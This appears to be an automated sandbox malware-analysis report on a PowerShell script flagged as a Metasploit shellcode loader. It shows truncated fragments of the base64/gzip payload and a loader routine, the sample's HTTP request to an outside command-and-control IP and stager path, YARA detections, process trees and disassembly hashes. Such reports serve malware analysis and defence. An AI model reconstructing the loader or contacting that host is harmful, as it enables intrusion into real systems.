Preview:	.********************..Windows PowerShell transcript start..Start time: 20210706144407..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 745773 (Microsoft Windows NT 10.0.17134.0)..Host Application: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -Version 5.1 -s -NoLogo -NoProfile..Process ID: 5964..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210706154742..********************..PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"..>> ParameterBinding(Invoke-Expression): name="Command"; value="function func_get_proc_address {..Param ($var_module, $var_procedure)....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-

Static File Info

General
File type:	ASCII text, with very long lines, with no line terminators
Entropy (8bit):	6.0516831551521815
TrID:
File name:	a.ps1
File size:	2716
MD5:	e79502a7f159ee2c72aa997e922559e3
SHA1:	12601ad19988ac4c58a245d151855439dc1a0382
SHA256:	90a17ac3595ed77f5f6cd307b3ffd2cf4c564aa05d132fdb37e7460d4081be70
SHA512:	710f2d25e1804d2126caae3d83ad03671107a2b7afba79f55e66ee41ea746c5e9f2093dfe13a4b5419853b894505a47a7b603c349a3c212e65036e7dd6501617
SSDEEP:	48:p36aM0PxfW7HR3+DwMTHe1iYkBz7lCfCdlH6kNcruPxWp7mbW5MQLT2R0bqVNlad:bZfQF+DwMTX92CHNcrUoCW5MQ/2a2VN4
File Content Preview:	$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1Xa2/iShL9HH6FP0QCFALmESAjjTRtjMGEt8E8cqPI2G3T0H7EbmPDnfnvWzaQm9nJ7I60i2TRbldVnz51ulxWMLtXmE90NnANzN2r2A+I63CVTOZWdGXGfeW+ZTNm6OgsmU4GrxZmr57v6q+aYfg4CLi/MzdjzddsLnd70PxX2zVCigtcepM

File Icon


Icon Hash:	72f2d6fef6f6dae4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 11:59:26.028086901 CEST	49745	80	192.168.2.4	206.189.69.35
Jul 6, 2021 11:59:26.217894077 CEST	80	49745	206.189.69.35	192.168.2.4
Jul 6, 2021 11:59:26.218163967 CEST	49745	80	192.168.2.4	206.189.69.35
Jul 6, 2021 11:59:26.218346119 CEST	49745	80	192.168.2.4	206.189.69.35
Jul 6, 2021 11:59:26.404046059 CEST	80	49745	206.189.69.35	192.168.2.4
Jul 6, 2021 11:59:26.404104948 CEST	80	49745	206.189.69.35	192.168.2.4
Jul 6, 2021 11:59:26.404242039 CEST	49745	80	192.168.2.4	206.189.69.35
Jul 6, 2021 11:59:31.313041925 CEST	80	49745	206.189.69.35	192.168.2.4
Jul 6, 2021 11:59:31.313107014 CEST	49745	80	192.168.2.4	206.189.69.35
Jul 6, 2021 11:59:47.319377899 CEST	49745	80	192.168.2.4	206.189.69.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 11:58:52.399827957 CEST	59123	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:52.454210997 CEST	53	59123	8.8.8.8	192.168.2.4
Jul 6, 2021 11:58:53.824522018 CEST	54531	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:53.880855083 CEST	53	54531	8.8.8.8	192.168.2.4
Jul 6, 2021 11:58:54.041060925 CEST	49714	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:54.089764118 CEST	53	49714	8.8.8.8	192.168.2.4
Jul 6, 2021 11:58:56.087383032 CEST	58028	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:56.133347034 CEST	53	58028	8.8.8.8	192.168.2.4
Jul 6, 2021 11:58:57.821995020 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:57.871536016 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 6, 2021 11:58:58.727308989 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:58:58.776709080 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:00.385740042 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:00.431643009 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:01.325911045 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:01.384735107 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:02.955292940 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:03.011639118 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:03.856595993 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:03.912257910 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:04.848855972 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:04.894778013 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:06.657771111 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:06.705609083 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:07.558307886 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:07.615963936 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:10.269695997 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:10.326077938 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:13.041897058 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:13.101243973 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:14.846647024 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:14.904649973 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:17.525921106 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:17.573476076 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:19.640860081 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:19.688546896 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:20.566019058 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:20.626306057 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:22.019617081 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:22.065891027 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:22.403009892 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:22.473103046 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:43.114118099 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:43.163302898 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:43.856755972 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:43.903170109 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:44.735065937 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:44.790071011 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:44.844343901 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:44.916907072 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:45.285898924 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:45.331839085 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:46.227063894 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:46.286513090 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:47.294503927 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:47.350241899 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:48.857867956 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:48.912322998 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:50.239355087 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:50.297755003 CEST	53	60875	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:51.541882992 CEST	56448	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:51.599258900 CEST	53	56448	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:52.051019907 CEST	59172	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:52.100462914 CEST	53	59172	8.8.8.8	192.168.2.4
Jul 6, 2021 11:59:55.850507021 CEST	62420	53	192.168.2.4	8.8.8.8
Jul 6, 2021 11:59:55.898976088 CEST	53	62420	8.8.8.8	192.168.2.4
Jul 6, 2021 12:00:03.206805944 CEST	60579	53	192.168.2.4	8.8.8.8
Jul 6, 2021 12:00:03.263451099 CEST	53	60579	8.8.8.8	192.168.2.4
Jul 6, 2021 12:00:31.298734903 CEST	50183	53	192.168.2.4	8.8.8.8
Jul 6, 2021 12:00:31.369956017 CEST	53	50183	8.8.8.8	192.168.2.4
Jul 6, 2021 12:00:33.344985008 CEST	61531	53	192.168.2.4	8.8.8.8
Jul 6, 2021 12:00:33.410820961 CEST	53	61531	8.8.8.8	192.168.2.4

HTTP Request Dependency Graph

206.189.69.35

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49745	206.189.69.35	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 11:59:26.218346119 CEST	1505	OUT	GET /x1Fm HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP) Host: 206.189.69.35 Connection: Keep-Alive Cache-Control: no-cache
Jul 6, 2021 11:59:26.404104948 CEST	1505	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Jul 2021 09:59:26 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 275 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 30 36 2e 31 38 39 2e 36 39 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 206.189.69.35 Port 80</address></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: powershell.exe PID: 7144 Parent PID: 3220

General

Start time:	11:58:57
Start date:	06/07/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1'
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.758206256.000001CDA068C000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, Author: Florian Roth Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.772219590.000001CDB7F20000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.758303422.000001CDA06A6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.758377802.000001CDA06B5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.758256296.000001CDA0693000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7164 Parent PID: 7144

General

Start time:	11:58:57
Start date:	06/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5964 Parent PID: 7144

General

Start time:	11:59:02
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x1130000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, Author: Florian Roth Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000005.00000000.700532257.0000000004DFB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000005.00000000.711757799.0000000004DFB000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000005.00000000.706990419.0000000008BB0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3124 Parent PID: 5964

General

Start time:	11:59:02
Start date:	06/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6244 Parent PID: 5964

General

Start time:	11:59:34
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
Imagebase:	0xe90000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 900 Parent PID: 5964

General

Start time:	11:59:35
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
Imagebase:	0xe90000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 7144 Parent PID: 3220 powershell.exeCOMMON

Executed Functions

Function 00007FFA35CD49DD, Relevance: 3.0, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

pi5, xrefs: 00007FFA35CD4CF3
pi5, xrefs: 00007FFA35CD4BB3

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID: pi5$pi5
API String ID: 0-1551460478
Opcode ID: debbabebcd9b518568b81cb222db7050a186a010ace82f55fb9407e1d29c445f
Instruction ID: 0662e61ec1ad7b4760bb430fbd5a9acf9d905c8548e04ea6939cfa7a4a5f85df
Opcode Fuzzy Hash: debbabebcd9b518568b81cb222db7050a186a010ace82f55fb9407e1d29c445f
Instruction Fuzzy Hash: 44D1477280EBCA5FD36697288C555E5BFE0EF53624B0941FFD08CCB093DA499816C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C05E15, Relevance: 1.9, Strings: 1, Instructions: 619COMMON

Download Yara Rule

Strings

La_H, xrefs: 00007FFA35C06163

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID: La_H
API String ID: 0-4239856055
Opcode ID: 0131118cb43d4155d68db50eb08c19ac0b0e48f4618d9d26b9299e51621f16ff
Instruction ID: 3a28d0badbfbe43570977839db4fc774ac57ee3b3352dd2fa0e540cd7a31025f
Opcode Fuzzy Hash: 0131118cb43d4155d68db50eb08c19ac0b0e48f4618d9d26b9299e51621f16ff
Instruction Fuzzy Hash: D3F1B331A08A4A8FDF94DF5CC485AA9BBE1FF59714F14816AD40DD7296CE35E882CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD33B3, Relevance: 1.7, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

xg5, xrefs: 00007FFA35CD3410

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID: xg5
API String ID: 0-979859911
Opcode ID: 51cecc6ccd74af987d367fc9bbeba7fa28984452f8ebf2d7f136f9c9cd80ae1d
Instruction ID: 8925947d4a996a175511f1a40624fd5a2314c98881468437a257f5f473527be7
Opcode Fuzzy Hash: 51cecc6ccd74af987d367fc9bbeba7fa28984452f8ebf2d7f136f9c9cd80ae1d
Instruction Fuzzy Hash: 48E1336390DB8A4FE7A6A76C48651B5BFE0EF53B14B1880FED04CCB193DD1AA815C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C01EAA, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

#__^, xrefs: 00007FFA35C01EB1

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID: #__^
API String ID: 0-1171491625
Opcode ID: a1d574f3fae16ebbccf375ea8a978dbb00e8cb6e8adddb4d45636680d159ce4c
Instruction ID: ade2d2765e6f21305be4d4500eeb9cfcb20f8e1356f8add87215f7ebc08f2d60
Opcode Fuzzy Hash: a1d574f3fae16ebbccf375ea8a978dbb00e8cb6e8adddb4d45636680d159ce4c
Instruction Fuzzy Hash: 9231CF3760CB594FC701EB1CE8919DAB7E1EF96320F04457BE089C7292DE24E94987D2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C031AC, Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7563bce806ec668f1661904bae0319d3343bc137f146b7b20dd3780a966a6b1d
Instruction ID: 5795d9cf01d8147d7b4267dd9951fc50ff14d2185110206f99879c0954238eb9
Opcode Fuzzy Hash: 7563bce806ec668f1661904bae0319d3343bc137f146b7b20dd3780a966a6b1d
Instruction Fuzzy Hash: C002F531A0CA4A8FDB98DB5CC485AA9BBF1FF69B14F144179D40DD7296CE25E842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD7740, Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8aff3d4fef90b11cb005e9476b95e04c2a06acb093ba26b0cd5e12eb364171
Instruction ID: 17d94d648727e9da378f4f3a74d9e049ef6506847425079d30531c7c4d6680f3
Opcode Fuzzy Hash: 5e8aff3d4fef90b11cb005e9476b95e04c2a06acb093ba26b0cd5e12eb364171
Instruction Fuzzy Hash: EFE1446390DB8A4FE7A697684C662B5BFE1EF13714B0880FBD04DC7093DD2AA815C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD35BA, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af253c15b737c2f689770423a1d4f2f7a91690c2ec7f6fe6c113078c1401b087
Instruction ID: 181cdf46cb28f2edc28183023f1b1a21a966c7412f1e265529dbac4384651c3f
Opcode Fuzzy Hash: af253c15b737c2f689770423a1d4f2f7a91690c2ec7f6fe6c113078c1401b087
Instruction Fuzzy Hash: B151B1A3A0DB874FE7A6976C4865178ABE1EF13E18B1980BAD00DC72D3DD0A9C15DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD78AA, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21461daa60f2cca60a5b4f8b3c2695c59092aa49d753b2f5ef6f42bc10c4f499
Instruction ID: 988b703bbcd5104e25882cf1918c899e742aaec043f1c6c43cf9fe56e48668b3
Opcode Fuzzy Hash: 21461daa60f2cca60a5b4f8b3c2695c59092aa49d753b2f5ef6f42bc10c4f499
Instruction Fuzzy Hash: FE51D36390DB874FE7A6976C48622786BE1AF17714B1880FED00DC71D3DD2EAC159B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35CD1585, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775247779.00007FFA35CD0000.00000040.00000001.sdmp, Offset: 00007FFA35CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc0af851e29049c7e3e89072e1532ad6e16700bd360ce61cca198c95e87ff9c
Instruction ID: 8d7df8ad2d85af85bd5686291f6f46fc93131e079d301c982603cd5a6afc9348
Opcode Fuzzy Hash: 8dc0af851e29049c7e3e89072e1532ad6e16700bd360ce61cca198c95e87ff9c
Instruction Fuzzy Hash: D541CE5790EBC60FE3AA832C58292706EE1DF57A54B4D80FAD04DCB1E3EC0E9C165351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35AEE540, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.774805016.00007FFA35AED000.00000040.00000001.sdmp, Offset: 00007FFA35AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa35aed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe369186219c187d3f5b6fd5dc7a6c95b8ddddad75527a594f3d9abc6fb7933
Instruction ID: 67414dfaaaec3527cebc76d6673d8242af4842d80207e10ce2db1f1a93b990fd
Opcode Fuzzy Hash: 8fe369186219c187d3f5b6fd5dc7a6c95b8ddddad75527a594f3d9abc6fb7933
Instruction Fuzzy Hash: 9941157081DBC44FE7569B2D9845A523FF0EF57220F1505DFD088CB1A3EA26A84AC792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C01B75, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.775063045.00007FFA35C00000.00000040.00000001.sdmp, Offset: 00007FFA35C00000, based on PE: false

